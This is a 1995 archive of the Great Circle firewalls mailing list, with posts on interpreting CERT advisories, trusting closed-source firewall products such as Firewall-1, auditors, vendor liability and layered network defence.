rmck From firewalls-owner Fri Sep 8 10:03:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23565 for firewalls-outgoing; Fri, 8 Sep 1995 09:42:24 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23557; Fri, 8 Sep 1995 09:42:19 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 8 Sep 1995 09:41:37 -0800 To: "Bryan D. Boyle" , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 7:51 AM 9/8/95, Bryan D. Boyle wrote: >We will not even begin to discuss the OS it runs on...which seems to be >the ongoing topic of CERT alerts du jour. That's the wrong way to interpret CERT advisories. CERT advisories are about security FIXES, not about security PROBLEMS, and the fixes are produced with the cooperation of the vendors in question. The fact that there are lots of CERT advisories for a given vendor doesn't (necessarily) mean that vendor is somehow less secure; it _does_ mean that the vendor is more willing than others to cooperate with CERT in producing advisories (which I think is a feature, not a bug). 
-Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Fri Sep 8 10:03:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23124 for firewalls-outgoing; Fri, 8 Sep 1995 09:30:27 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23117 for ; Fri, 8 Sep 1995 09:30:22 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10182; Fri, 8 Sep 95 12:15:19 -0400 Date: Fri, 8 Sep 95 12:15:18 -0400 Message-Id: <9509081615.AA10182@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Software concerns Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> 3. The question here is a legit one, how can you trust a firewall when >> you don't know what the code looks like? >Please, let's not have that flame war again. I think everyone knows the >pros and cons by now... Think this is an important issue and not necessarily a flame war. I personally would not buy security software from anyone unless at least one of the following conditions were met: 1) Can review the source code and verify that this matches the product. 2) Trust the vendor. 3) Product has been reviewed (as in 1) by someone trusted. (1) is obviously the most rigorous but also the most time consuming. (2) is more involved & generally requires being personally acquainted with the principals. Biggest problem is proving that they are free from outside interests/pressures. (3) being in the USA I would trust a review by the NSA and a very few others. 
Buying security is different from buying a word processor and must be weighed against what is at risk and the effect on your customer base if an exception occurs. Obviously this is going to have different values for an .EDU as opposed to a DoD contractor (well maybe if the .EDU relies on grants...). Many remember WYSIWYG - my motto is WYDSIWGY "What you don't see is what gets you". Warmly, Padgett ps 10,000,000 lemmings can't be rong. From firewalls-owner Fri Sep 8 11:01:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA25395 for firewalls-outgoing; Fri, 8 Sep 1995 10:31:22 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA25388 for ; Fri, 8 Sep 1995 10:31:19 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id NAA00457; Fri, 8 Sep 1995 13:29:48 -0400 From: David Kovar Message-Id: <199509081729.NAA00457@nda.nda.com> Subject: Re: Firewall-1 concerns To: iceman@MBnet.MB.CA (Oliver Friedrichs) Date: Fri, 8 Sep 1995 13:29:48 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Oliver Friedrichs" at Sep 8, 95 12:22:09 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 518 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Someone seriously without a clue, is more like it. > > You have proof this isn't so ? No - it's a valid point, unless you want > to send me source code so I can check myself. > > - I reacted hastily and without thought. What I should have said is that this issue has been hashed, and rehashed many times on this list and that posting what appears to be flame-bait anonymously isn't going to help resolve the issue. I apologize for my rash statement. 
-David From firewalls-owner Fri Sep 8 11:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26313 for firewalls-outgoing; Fri, 8 Sep 1995 10:56:53 -0700 Received: from sdwsys (lig.cinti.net [204.248.145.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA26297 for ; Fri, 8 Sep 1995 10:56:49 -0700 Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0sr85L-0009yvC; Fri, 8 Sep 95 14:23 EDT Message-Id: From: sdw@lig.net (Stephen D. Williams) Subject: Re: linux vs. *bsd for secure networking system To: blymn@awadi.com.AU (Brett Lymn) Date: Fri, 8 Sep 1995 14:23:30 -0400 (EDT) Cc: Marius@doulosgeri.com, firewalls@greatcircle.com In-Reply-To: <9509060236.AA17739@bunya.awadi> from "Brett Lymn" at Sep 6, 95 12:06:36 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1571 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > According to Marius: > > > >weak points, just like everything else does, but I just wanted to say > >a few words in its defense... > > > > A very reasonable response! > > And to redress Karl's omission - you can also go the path of NetBSD > which, unlike FreeBSD, has ports to a whole gaggle of different > machines - not just PC's. The ports that are running are listed on > the WWW page at www.netbsd.org, ones I can remember are Mac, Suns, > Amiga, some HP boxen - there are others. Once you have installed a distribution and actually started using it, it doesn't make sense to think about distributions: I just update kernel, compiler, libraries, utilities, etc. as they are updated. Distributions are always behind the curve quite a bit. > Brett Lymn, Computer Systems Administrator, AWA Defence Industries > =============================================================================== > "It's fifteen hundred miles to Ankh-Morpork" he said. 
"We've got > three hundred and sixty three elephants, fifty carts of forage, the > monsoon's about to break and we're wearing ... we're wearing ... sort > of things, like glass, only dark... dark glass things on our eyes..." > - Terry Pratchett "Moving Pictures". > > > -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From firewalls-owner Fri Sep 8 11:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26747 for firewalls-outgoing; Fri, 8 Sep 1995 11:17:23 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA26739 for ; Fri, 8 Sep 1995 11:17:18 -0700 Date: Fri, 8 Sep 1995 11:17:18 -0700 Message-Id: <199509081817.LAA26739@miles.greatcircle.com> X-Authentication-Warning: internet: Host perseids.milkyway.com claimed to be [192.168.77.77] From: "Hung Vu" Reply-To: "Hung Vu" To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ok .. so given that ... we have a need for a commercially available firewall > product. HELP! I don't even begin to know well, how to evaluate them .. Send a message to info@milkyway.com to request more information on the Black Hole from Milkyway Networks Corporation. The Black Hole is currently being certified for an AL-1 security level from the Common Criteria which is recognized by the G-7 countries. Hung. 
From firewalls-owner Fri Sep 8 11:32:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA27087 for firewalls-outgoing; Fri, 8 Sep 1995 11:27:12 -0700 Received: from datasrv.co.il (zeus.datasrv.co.il [192.114.20.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA27080 for ; Fri, 8 Sep 1995 11:27:05 -0700 Received: by datasrv.co.il id AA14398 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Fri, 8 Sep 1995 20:25:15 +0300 Date: Fri, 8 Sep 1995 20:25:11 +0300 (IDT) From: ORMAT Subject: Re: Firewall-1 concerns To: Bob McKisson Cc: firewalls@greatcircle.com In-Reply-To: <9509081617.AA00414@sandfiddler.paragon-systems.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 8 Sep 1995, Bob McKisson wrote: [snip] > information being protected by Israeli code. In my view it ain't the > MOSSAD (Ministry of State Security and Defense) you should be worried > about. > > rmck > It's nice to see you found meaning in the letters of the word Mosad, but it's not even an English word (and definitely not spelled with capital letters). The word is in Hebrew and means 'firm' or 'agency'. I know this is off topic, but I just couldn't help myself. 
Arik From firewalls-owner Fri Sep 8 12:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26643 for firewalls-outgoing; Fri, 8 Sep 1995 11:13:19 -0700 Received: from pnh10.med.navy.mil ([164.167.53.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA26630 for ; Fri, 8 Sep 1995 11:13:11 -0700 Received: from mclo11 (mclo11.med.navy.mil) by pnh10.med.navy.mil with SMTP id AA03220 (5.65c/IDA-1.4.4 for ); Fri, 8 Sep 1995 13:57:31 -0400 Message-Id: <199509081757.AA03220@pnh10.med.navy.mil> X-Sender: pnh1rgr@mclo10.med.navy.mil Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 08 Sep 1995 14:07:10 -0400 To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security), firewalls@greatcircle.com From: pnh1rgr@mclo10.med.navy.mil (Bob Resino) Subject: Re: Software concerns X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Snip] >3) Product has been reviewed (as in 1) by someone trusted. > >(1) is obviously the most rigorous but also the most time consuming. >(2) is more involved & generally requires being personally acquainted > with the principals. Biggest problem is proving that they are free > from outside interests/pressures. >(3) being in the USA I would trust a review by the NSA and a very few others. Don't know if I could trust them, Padgett. DISA took NSA at their word about C2 WIN NT(AS) 3.5 and didn't look real close at the platform it was submitted on. DISA has now approved the installation of NT boxes on DISN. For more info, see the 4 Sept issue of Government Computer News. > >Buying security is different from buying a word processor and must be weighed >against what is at risk and the effect on your customer base if an >exception occurs. Obviously this is going to have different values for >an .EDU as opposed to a DoD contractor (well maybe if the .EDU relies >on grants...). 
> >Many remember WYSIWYG - my motto is WYDSIWGY "What you don't see is what >gets you". > > Warmly, > Padgett > >ps 10,000,000 lemmings can't be rong. pps: ...nothing up my sleeve. Hey Rockie, watch me pull a rabbit out of my hat... B. Moose --------------------------------------------------------------- Bob Resino (RGR24) pnh1rgr@pnh10.med.navy.mil (804)398-7400 Healthcare Support Office Fax:(804)398-7265 Medical Construction Liaison Department Management Information / Data-telecommunciations Div (Code 55) 6500 Hampton Blvd "To be or not to be... Norfolk, VA 23707 What was the question ?" --------------------------------------------------------------- The opinions are mine, NOT those of the Navy or the Healthcare Support Office. If they happen to be the same, its got to be coincidence! From firewalls-owner Fri Sep 8 12:02:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA28099 for firewalls-outgoing; Fri, 8 Sep 1995 11:43:04 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA28083 for ; Fri, 8 Sep 1995 11:42:57 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA28078; Fri, 8 Sep 1995 14:41:30 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA08188; Fri, 8 Sep 1995 14:41:27 -0400 Message-Id: <9509081841.AA08188@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@GreatCircle.COM Date: Fri, 8 Sep 1995 14:40:28 -0500 Subject: Re: Firewall-1 concerns Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 8 Sep 95 at 9:31, Peter da Silva said: > > 3. The question here is a legit one, how can you trust a firewall when > > you don't know what the code looks like? 
> > Please, let's not have that flame war again. I think everyone knows the > pros and cons by now... Perhaps to be added to the FAQ...? -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Fri Sep 8 12:28:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA28327 for firewalls-outgoing; Fri, 8 Sep 1995 11:50:06 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA28319 for ; Fri, 8 Sep 1995 11:49:58 -0700 From: dmurphy@coltrane.cwa.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10840; Fri, 8 Sep 95 14:48:21 -0400 Date: Fri, 8 Sep 95 14:48:20 -0400 Message-Id: <9509081848.AA10840@uvs1.orl.mmc.com> To: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com, padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Subject: Corporate Audits Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gentlebeings, Two threads here ("Software concerns" and "Upgrade commercial firewalls") have both touched today on corporate decision-making wrt firewalls. Just as corp. decisions about HW in the '70's ("No one gets fired for buying IBM."), or desktop SW reached in the '90's ("No one gets fired for buying Microsoft.") kept, um, "sub-optimal" solutions (and vendors) alive past their prime, so today they're buying the "magic bullet" of firewalls as the solution to network security. Warmly Padgett, Almost-Esq., pointed out the "who can you trust" aspect of this behavior, albeit by counter-example. Steve Marquess pointed out the equally important "who can you blame" aspect, which we'd be foolish to overlook (info-sec is, after all, primarily about human, not mechanical, failures). 
And both aspects indicate that the answer lies, or will soon, in what *corporate auditors* collectively decide is a reasonably prudent business decision in this area. Nobody keeps corporate receipts in a cigar box in the receptionist's desk, in part because (in the US) that would violate the "reasonably prudent" standard of business behavior used to judge if a decision was just bad (management not liable to shareholders) or negligently stupid (management *personally* on the hook). Such legal decisions across the country get composted down into a set of "generally accepted" business practices, which are then enforced by the corporate auditors, whose "cold comfort" letter in the annual report tells shareholders that the corporate procedures they've looked at pass muster, and by later court decisions. So, have any of you big-business wage-slaves had corporate auditors come into your shop and ask questions (perceptive or otherwise) about firewalls and network security yet, and if so, would you be willing/able to share such stories with the list? Better yet, does anybody work for one of the Used-To-Be-Big-7 accounting firms and know what they're doing internally about this? 
+----------------------------------------------------------------------+
| Dan Murphy | CWA Comm Products | 401 Alberto Wy, Los Gatos, CA 95032 |
| Vox: (408) 358-1529 | Fax: (408) 356-7061 | Email: dmurphy@cwa.com   |
+----------------------------------------------------------------------+

From firewalls-owner Fri Sep 8 12:30:22 1995
Date: Fri, 8 Sep 95 14:52:01 -0400
Message-Id: <9509081852.AA10867@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "dmurphy@coltrane.cwa.com"@UVS1.dnet.mmc.com
Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: RE: Corporate Audits

>Warmly Padgett, Almost-Esq., pointed out the "who can you trust" aspect
>of this behavior, albeit by counter-example. Steve Marquess pointed out
>the equally important "who can you blame" aspect, which we'd be foolish to
>overlook

Have a few reasons for avoiding that aspect:

1) "Who you gonna blame" deals with revenge/recovery/CYA, something I have
   little time for. My purpose is to avoid the exception from happening in
   the first place (not always successful but have never seen
   finger-pointing to be useful except to demonstrate a need for training).

2) Just the first occupies far more than 40 hours a week.

3) Determining the "fall guy" is rarely a technical issue.

>So, have any of you big-business wage-slaves had corporate auditors come
>into your shop and ask questions (perceptive or otherwise) about
>firewalls and network security yet, and if so, would you be willing/able
>to share such stories with the list? Better yet, does anybody work for
>one of the Used-To-Be-Big-7 accounting firms and know what they're doing
>internally about this?

Training the auditors is sometimes part of my job, can be very handy for
adopting unpopular/unfunded practices by having a department get gigged for
something that you just happen to have a no-brane solution for.

From what I have seen, the "Big-7" is rapidly becoming a vast horde of
"LLP"s - Limited Liability Partnerships with the parent company acting as
matchmaker. Don't have to be a rocket scientist to translate that.

Warmly,
Padgett

ps closest I've been lately to being a "shield bearer" is seeing a copy of
Black's in a store yesterday.

From firewalls-owner Fri Sep 8 12:35:08 1995
From: ris1!nmti.com!peter@uuneo.neosoft.com
Date: Fri, 8 Sep 95 15:27:19 -0400
Message-Id: <9509081927.AA10992@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security)
Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Subject: On Trusting Trust

> 3) Product has been reviewed (as in 1) by someone trusted.

> (3) being in the USA I would trust a review by the NSA and a very few others.

The "40 bit keys are all anyone needs" NSA? What's their incentive to
encourage good firewalls? The Clipper Chip people?

OK folks, imagine there was to be a firewall certification authority. Who
would you want them to be? Who do you trust?

From firewalls-owner Fri Sep 8 13:22:12 1995
Reply-To: Peter.BEAN@ldn01.x400.gc.ca
Date: Fri, 08 Sep 1995 19:30:02 +0000
From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES)
To: Firewalls@GreatCircle.COM
Subject: Firewalls-Digest V4 #518
Message-Id: <1014*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS>
In-Reply-To: <199509081803.LAA26470*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS>

I am away from the office until Monday, 18 September 1995

From firewalls-owner Fri Sep 8 13:31:51 1995
Date: Fri, 8 Sep 1995 16:19:04 -0400
From: rmck@sandfiddler.paragon-systems.com (Bob McKisson)
Message-Id: <9509082019.AA00612@sandfiddler.paragon-systems.com>
To: ormat1@zeus.datasrv.co.il
Subject: Re: Firewall-1 concerns
Cc: firewalls@GreatCircle.COM

> It's nice to see you found meaning in the letters of the word Mosad, but
> it's not even an English word (and definitely not spelled with capital
> letters). The word is in Hebrew and means 'firm' or 'agency'.
>
> I know this is off topic, but I just couldn't help myself.

Well, I was only half joking. Regardless, indeed you are absolutely right.
An old Israeli friend of mine at the Pentagon just called to thank me for
the publicity. His translation was somewhat different but you two are close
enough. And enough said.

rmck

From firewalls-owner Fri Sep 8 13:32:27 1995
Date: Fri, 8 Sep 95 15:38:22 -0400
Message-Id: <9509081938.AA11038@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: On trusting trust

>> (3) being in the USA I would trust a review by the NSA and a very few others.

>The "40 bit keys are all anyone needs" NSA? What's their incentive to
>encourage good firewalls? The Clipper Chip people?

Ok, you want the long form? I would trust the NSA to follow their charter
as currently directed by the political appointee that runs the place.

One size need not fit all. Please notice that I said "I would trust...",
did not say that anyone else should. YOU have to make the decision who YOU
are going to trust. Besides, not everyone on this list is in the USofA so
some would probably be better served by asking the Mossad for advice. You
have your phone numbers, I have mine.

However, if I had a candidate FireWall and the NSA/NCSC had looked at it
and when I asked they said something like "we know of no reason to exclude
it from consideration" (don't expect to get an unclassified declarative
sentence from a NSA rep on duty beyond "it's a nice day"), it would
probably stay in contention (same goes for engineers 8*).

>OK folks, imagine there was to be a firewall certification authority. Who
>would you want them to be? Who do you trust?

I suspect that there is no one good answer to that since the question really
is "who do you trust to put your interests at least as high as their own".
For some lurkers, the answer might be "Emmanuel Goldstein", others "Arthur
Andersen", "Kroll Associates", or "my mother" - and *in their context* each
would be correct.

Of course, if you add "who is *competent* to certify a firewall", then the
list gets a whole lot shorter. Add "purely objectively" and we are down to
zero (a shame but true). Magazines try to be objective but typically lack
technical expertise and those techies on call are rarely unbiased.

So it comes down to "of those who are competent and whose biases will
probably coincide with those of my employer in this matter" and I said "the
NSA is one".
Warmly,
Padgett

ps "the buck stops here"

From firewalls-owner Fri Sep 8 14:08:21 1995
From: "Jim Leo"
Organization: Pitt Community College
To: firewalls@GreatCircle.com
Date: Fri, 8 Sep 1995 16:39:59 EST5EDT
Subject: Request for Information
Reply-To: admin@everett.pitt.cc.nc.us

Gee,

The last time I posted to this list, I got flamed but good... Now it seems
that other people have the same concerns as I do about commercial firewall
products. Nuff' said 'bout that...

I need some help from the folks on the list. I have been 'tasked' with
evaluating three (3) methods of security implementation and then writing
an evaluation/report. The three are:

    1. Proxy Servers
    2. Packet Filtering
    3. Fireswalls

Don't ask me about #3. Suffice it to say 'they' are not exactly literate
on topics such as these.

I currently have the 'recommended' literature. However, now I have to set
up my 'test bed' and then bludgeon it. What I need are recommendations from
the list. I also need to know where to get a set of good 'bludgeons'....

Please respond directly. NOT to the list. All confidentiality will be
preserved..

They also want me to do a survey.......

More Later...

Over the barrel again
Jim Leo
voice (919) 321-4346

From firewalls-owner Fri Sep 8 14:15:49 1995
From: Shawn Steele
Message-Id: <9509081324.ZM24627@aob.org>
Date: Fri, 8 Sep 1995 13:24:53 -0600
In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V4 #518" (Sep 8, 11:03am)
References: <199509081803.LAA26470@miles.greatcircle.com>
To: Firewalls@greatcircle.com
Subject: upgrade to commercial firewalls

> Interesting comment though from him, which in my naivete I'd not
> thought about. If we get attacked and lose software/data etc, then
> who's liable ?
> If we use freeware products, then no one is. If we use a commercial
> product, then we can, I guess, sue the firewall supplier ... ?

Ah, sue-happy America. I seriously doubt you'll find a supplier that doesn't
have some sort of clause specifically disallowing any damages from using
their product. (A friend recently had his house broken into, I doubt he
could successfully sue the deadbolt manufacturer). It does give someone an
"it's not my fault" escape though, even if they misconfigured something,
especially if management doesn't know much about computer security.

- shawn

Shawn Steele
Information Systems Administrator     Association of Brewers
(303) 447-0816 x 118 (voice)          736 Pearl Street
(303) 447-2825 (fax)                  PO Box 1679
shawn@aob.org (e-mail)                Boulder, CO 80306-1679
info@aob.org (aob info)               U.S.A.
http://www.aob.org/aob (web)

Note: When replying to my messages, please include enough of my message so
that I know what you're replying to! :-)

From firewalls-owner Fri Sep 8 14:30:30 1995
From: Brad.Powell@eng.sun.com
Date: Fri, 8 Sep 95 17:19:22 -0400
Message-Id: <9509082119.AA11400@uvs1.orl.mmc.com>
To: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com, padgett@tccslr.dnet.mmc.com, dmurphy@coltrane.cwa.com
Subject: Re: Corporate Audits

>From firewalls-owner@GreatCircle.COM Fri Sep 8 13:01:46 1995
>Subject: Corporate Audits

Dan writes:

>+----------------------------------------------------------------------+
>| Dan Murphy | CWA Comm Products | 401 Alberto Wy, Los Gatos, CA 95032 |
>| Vox: (408) 358-1529 | Fax: (408) 356-7061 | Email: dmurphy@cwa.com   |
>+----------------------------------------------------------------------+
>So, have any of you big-business wage-slaves had corporate auditors come
>into your shop and ask questions (perceptive or otherwise) about
>firewalls and network security yet, and if so, would you be willing/able
>to share such stories with the list? Better yet, does anybody work for
>one of the Used-To-Be-Big-7 accounting firms and know what they're doing
>internally about this?
>

I'll tell you one thing they better not be doing and that's trusting all
their defences to *just* the firewall. Some of the ones I've talked with
(that happened to -pass- their audit) have gone to an internal approach of
also securing the desktops and enhancing the internal network.

The four "A"'s

    Authentication
    Authorization
    Accountability
    Access control

The firewall should be your best/strongest defence but it should *never* be
your _only_ defence

=======================================================================
Brad Powell : brad.powell@Sun.COM        Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views
of Sun Microsystems Inc.
=======================================================================

From firewalls-owner Fri Sep 8 15:00:35 1995
Date: Fri, 8 Sep 1995 14:45:06 -0700
From: Eric Eigenfeld
Message-Id: <199509082145.OAA02362@chum.hooked.net>
To: firewalls@GreatCircle.COM
Subject: mirrored fw

Greetings,

I am developing plans for a mirrored fw architecture. The client requires
2--->n locations, each with its own independently operating, complete
architecture that could assume control on demand. User base is quite large,
and firewalls are already implemented and functioning in multiple locations.

Throw in automatic mirroring of changes to internal and external web
servers, a left handed monkey wrench for adjustments, and they're happy.

Any experiences with mirrored firewalls?

Thanks in advance,

Eric Eigenfeld
Director, Client Services
National Data Management

From firewalls-owner Fri Sep 8 15:02:33 1995
From: Brad.Powell@eng.sun.com
Date: Fri, 8 Sep 95 17:30:20 -0400
Message-Id: <9509082130.AA11429@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com, ris1!nmti.com!peter@uuneo.neosoft.com
Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Subject: Re: On Trusting Trust

>From firewalls-owner@GreatCircle.COM Fri Sep 8 13:18:06 1995
>From: ris1!nmti.com!peter@uuneo.neosoft.com
>Date: Fri, 8 Sep 95 15:27:19 -0400
>
>OK folks, imagine there was to be a firewall certification authority. Who
>would you want them to be? Who do you trust?
>

I thought we already went through this last month :-(

"Trust but verify independently" is the common auditor's approach.
"Trust no one" is the common thinking on firewalls.

Please don't get me wrong, it's not that reputable firewall vendors and code
writers are not striving for 100% safe. It's just that anyone can make a
mistake (I'm probably making one right now by getting sucked into this)

So how do you sleep at night? Well imho you sleep by first learning to live
with a little risk and second by giving yourself more than one layer of
protection. The "onion" approach to security.
:-)

Multiple layers, and not all the layers being equal or from the same vendor,
will give you a better chance at detecting intrusions, and a better chance
at stopping the intrusion before it costs you/your-company significant cost.
Place your more sensitive data ($$$) closer to the center of the onion and
the "more public" (less $$$) closer towards the outside of the onion and you
will start getting warm-n-fuzzy and be able to sleep better.

The reason I use the onion model is because like an onion the more layers
you make users peel away to get to the data they need the more they are
going to cry about it :-).

=======================================================================
Brad Powell : brad.powell@Sun.COM        Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views
of Sun Microsystems Inc.
=======================================================================

From firewalls-owner Fri Sep 8 15:30:02 1995
From: silveira@nutecpa.nutec.tche.br
Date: Fri, 08 Sep 95 18:46:08 -0300
Subject: Re: Firewall-1 concerns
To: firewalls@greatcircle.com
In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl>
Message-ID: <9509081844.aa27730@canario.canario.nutecsp.br>

On Thu, 7 Sep 1995, nobody@replay.com (Anonymous) wrote:

>I recently found out that the Firewall-1 product from Sun is actually
>written and developed by a company in Israel and that Sun does not have
>nor has access to the source code.

[snip, snip, snip]

>It turns out that Sun does not have the source and hasn't inspected it.
> hope that the US military and other sensitive agencies or companies
>with sensitive information aren't using this product for protection.
>

Ignoring the fact that this poster didn't put his/her e-mail (which I think
is not proper in a public forum), he/she may have raised a few interesting
topics:

- If it is true that Sun hasn't access to source (anybody from Sun with an
  official statement please jump in), how can it offer this solution to US
  customers, including the government?

- Let's assume that a new attack is discovered and that FW-1 customers,
  without access to source, are compromised. Who can they hold liable for
  the damages, if anybody?

Finally, on a broader issue, a question from me: How are contracts signed
between the firewall provider and the customer with regard to the
possibility of a successful attack?

TIA,

Fernando
--
Fernando da Silveira Montenegro     E-mail: silveira@nutec.com
Nutec Informatica S.A.              Phone.: +55-11-505-5728
Rua Florida, 1821/4th floor         Fax...: +55-11-505-1918
Sao Paulo, SP  BRAZIL 04565-001

From firewalls-owner Fri Sep 8 18:00:13 1995
From: ddill@junix.ju.edu (Daniel Dill)
Message-Id: <9509090052.AA16921@junix.ju.edu>
Subject: Re: upgrade to commercial firewalls
To: dannyc@gmap.leeds.ac.uk (Danny Cox)
Date: Fri, 8 Sep 1995 20:52:02 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <5290.9509081145@gmap.leeds.ac.uk> from "Danny Cox" at Sep 8, 95 12:45:48 pm

>
> Interesting comment though from him, which in my naivete I'd not thought
> about. If we get attacked and lose software/data etc, then who's liable ?
> If we use freeware products, then no one is. If we use a commercial product,
> then we can, I guess, sue the firewall supplier ... ? At least that was
> his comment, and I'd be very interested to hear what you all think to this
> concept. This is based on the idea that they'd be covered by their indemnity
> insurance ...
>
> Thanks all, I appreciate your time,
> Danny
>

This is NOT personal, but...

What about personal responsibility? Everyone else pays because a few
companies are not willing to spend the time, effort, money to develop the
necessary expertise.

Regards,
Daniel
--
Daniel L. Dill          Ultimately, the strongest argument for the people
                        to retain the right to keep and bear arms, is to
ddill@junix.ju.edu      protect themselves against tyranny in government.
                                                    --Thomas Jefferson

From firewalls-owner Fri Sep 8 18:02:34 1995
Date: Fri, 8 Sep 95 20:34:15 -0400
Message-Id: <9509090034.AA11877@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: RFI

a) if you want a direct response, include your address in the body, not all
   of our mail readers provide the original header (I can't even do a reply -
   it would go to "firewalls-owner" so must FORW & retype the Subject:)

b) Jim rites:

